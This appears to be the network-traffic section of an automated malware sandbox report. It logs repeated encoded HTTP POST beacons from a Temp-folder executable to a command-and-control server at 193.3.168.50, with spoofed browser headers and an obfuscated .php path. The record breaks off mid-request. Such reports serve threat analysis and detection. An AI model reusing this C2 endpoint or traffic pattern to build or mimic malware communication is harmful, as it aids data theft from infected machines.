                                                                                                                  Data Raw: 39 38 0d 0a 09 11 25 13 25 3b 2c 56 33 02 01 1a 3c 0d 27 06 39 0d 05 5e 33 3d 32 1d 32 03 3f 52 3d 03 34 01 36 3d 07 04 29 3a 34 0e 3f 09 37 0f 2a 12 20 58 00 1a 25 01 34 21 3b 05 2e 17 02 59 32 04 29 06 24 5b 29 14 2a 00 2b 50 3d 33 34 54 25 3e 04 57 3d 55 3e 09 3b 1a 3e 07 2e 00 00 1b 32 3f 2a 52 0e 17 21 51 3e 3e 28 12 23 57 25 55 2a 21 01 59 2b 2c 27 55 30 5e 3a 52 22 2d 26 0b 27 23 36 0d 33 32 31 0e 27 5e 28 00 25 01 30 5c 3e 29 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%%;,V3<'9^3=22?R=46=):4?7* X%4!;.Y2)$[)*+P=34T%>W=U>;>.2?*R!Q>>(#W%U*!Y+,'U0^:R"-&'#6321'^(%0\>) _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  44192.168.2.449824193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:13.669290066 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:14.048043966 CET1060OUTData Raw: 5f 50 5f 59 59 58 5a 51 5a 58 51 52 55 54 5a 5e 50 51 5d 53 59 59 57 47 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _P_YYXZQZXQRUTZ^PQ]SYYWG^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-;)=)Z!%%,?9X4) U98$,R#T%_'?! ?>#G $],)
                                                                                                                  Dec 5, 2024 10:54:14.907636881 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:15.141366959 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:14 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  45192.168.2.449830193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:15.388012886 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:54:15.737174988 CET1060OUTData Raw: 5f 5e 5f 53 59 5f 5f 50 5a 58 51 52 55 51 5a 53 50 5e 5d 5a 59 53 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _^_SY__PZXQRUQZSP^]ZYSWB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-,V%]?)X76./"4 ,07X$Z;!!%X3>C57)=#G $],=
                                                                                                                  Dec 5, 2024 10:54:16.625627995 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:16.861372948 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:16 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  46192.168.2.449835193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:17.154334068 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:54:17.502710104 CET1060OUTData Raw: 5f 5e 5f 5c 59 5c 5f 54 5a 58 51 52 55 54 5a 59 50 5e 5d 5a 59 5c 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _^_\Y\_TZXQRUTZYP^]ZY\WI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.;5_<'46%;,&4*$U-3<$7160-3"8T(-#G $],)
                                                                                                                  Dec 5, 2024 10:54:18.393225908 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:18.629383087 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  47192.168.2.449841193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:18.875300884 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:19.221476078 CET1060OUTData Raw: 5a 5d 5f 5c 5c 59 5a 52 5a 58 51 52 55 5f 5a 5b 50 5f 5d 5e 59 5b 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: Z]_\\YZRZXQRU_Z[P_]^Y[WI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.X8 (4 \,,!X 97,370<W#2!3=$! 0>=#G $],
                                                                                                                  Dec 5, 2024 10:54:20.113811970 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  48192.168.2.449842193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:20.155073881 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:20.502754927 CET1936OUTData Raw: 5f 5c 5a 59 59 58 5f 54 5a 58 51 52 55 51 5a 5f 50 53 5d 5f 59 5f 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _\ZYYX_TZXQRUQZ_PS]_Y_WA^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/#!?_4]#%>\8: (-'Y%,$R 5$>+!4W*-#G $],=
                                                                                                                  Dec 5, 2024 10:54:21.393438101 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:21.629386902 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 39 38 0d 0a 09 11 25 12 30 05 3b 0a 24 2c 2c 0b 3c 33 01 07 39 20 3b 5f 24 2e 3d 0b 31 14 02 0f 3d 39 34 04 36 3e 2e 10 3f 3a 2f 1e 28 19 34 56 2a 12 20 58 00 1a 26 5c 23 54 3c 5b 2e 00 33 05 26 3d 0b 04 26 2d 07 5f 29 17 30 0e 3e 0d 12 57 25 2e 03 0f 29 20 2a 0d 2d 24 0b 58 39 00 04 58 25 05 2a 52 0e 17 21 1b 29 00 0e 59 37 22 36 0e 29 21 0e 04 2b 2c 27 1f 33 3b 32 54 23 3e 22 0c 27 23 21 55 30 21 2a 55 27 38 3b 5a 25 59 33 00 2a 13 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%0;$,,<39 ;_$.=1=946>.?:/(4V* X&\#T<[.3&=&-_)0>W%.) *-$X9X%*R!)Y7"6)!+,'3;2T#>"'#!U0!*U'8;Z%Y3* _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  49192.168.2.449844193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:20.276611090 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:20.627729893 CET1060OUTData Raw: 5f 5b 5a 58 5c 59 5f 52 5a 58 51 52 55 56 5a 58 50 5e 5d 5c 59 52 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _[ZX\Y_RZXQRUVZXP^]\YRWA^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-;-<977.,,-Z49:]3 7^'-<@6 0)=#G $],!
                                                                                                                  Dec 5, 2024 10:54:21.515396118 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:21.749331951 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  50192.168.2.449849193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:22.000765085 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:54:22.346514940 CET1060OUTData Raw: 5f 5f 5f 52 5c 5c 5a 53 5a 58 51 52 55 54 5a 59 50 57 5d 5e 59 5c 57 43 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: ___R\\ZSZXQRUTZYPW]^Y\WC^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.Y,=<) %"_,Z%!* S:;3?0W49$,@!0S)#G $],)
                                                                                                                  Dec 5, 2024 10:54:23.239417076 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:23.473486900 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:23 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  51192.168.2.449855193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:23.746857882 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1056
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:54:24.096457005 CET1056OUTData Raw: 5f 5b 5f 52 5c 5e 5f 55 5a 58 51 52 55 57 5a 59 50 57 5d 5c 59 5e 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _[_R\^_UZXQRUWZYPW]\Y^WB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\._8(9$46&Z/ *?9$,T!"6'> B"V S>=#G $],-
                                                                                                                  Dec 5, 2024 10:54:24.985985994 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:25.221291065 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  52192.168.2.449861193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:25.462532997 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:25.815372944 CET1060OUTData Raw: 5f 50 5f 5d 5c 5b 5f 52 5a 58 51 52 55 56 5a 5b 50 55 5d 5c 59 5e 57 45 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _P_]\[_RZXQRUVZ[PU]\Y^WE^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.8 *?# ^;,- - 40T71!Z$<D##;(-#G $],!
                                                                                                                  Dec 5, 2024 10:54:26.700790882 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  53192.168.2.449863193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:26.764516115 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:27.112154961 CET1936OUTData Raw: 5f 51 5f 58 59 57 5f 50 5a 58 51 52 55 5f 5a 59 50 52 5d 52 59 52 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _Q_XYW_PZXQRU_ZYPR]RYRWB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.^-05_(9#9/<% 7:%,07T5Z3,@!+)#G $],
                                                                                                                  Dec 5, 2024 10:54:28.002809048 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:28.237238884 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:27 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 39 38 0d 0a 09 11 25 1d 27 38 3c 57 24 2c 2f 1a 28 23 3c 59 2d 0d 27 11 27 00 29 0b 31 5c 34 0a 3e 04 28 01 21 2e 31 03 29 39 0a 0b 3f 0e 3f 0e 29 28 20 58 00 1a 25 06 37 32 2c 11 2e 17 2f 01 24 2d 32 5f 24 2e 3a 03 29 17 3f 52 3e 33 24 57 32 07 2a 50 29 33 0b 51 2d 24 00 05 39 07 2e 14 25 2f 2a 52 0e 17 21 57 2a 3e 06 59 37 08 21 13 3e 0f 2b 16 3c 2f 23 1e 26 2b 3d 0d 34 07 29 53 30 20 25 57 24 1c 0c 54 25 28 23 13 26 01 02 5a 29 29 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%'8<W$,/(#<Y-'')1\4>(!.1)9??)( X%72,./$-2_$.:)?R>3$W2*P)3Q-$9.%/*R!W*>Y7!>+</#&+=4)S0 %W$T%(#&Z)) _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  54192.168.2.449867193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:26.903601885 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1056
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:27.252861023 CET1056OUTData Raw: 5f 5f 5a 58 59 5b 5a 5e 5a 58 51 52 55 57 5a 59 50 56 5d 52 59 52 57 44 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: __ZXY[Z^ZXQRUWZYPV]RYRWD^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\., ^+8#*\8>#R,#<$$S7!Z$.<5*#G $],-
                                                                                                                  Dec 5, 2024 10:54:28.141382933 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:28.373301029 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:27 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  55192.168.2.449869193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:28.663238049 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
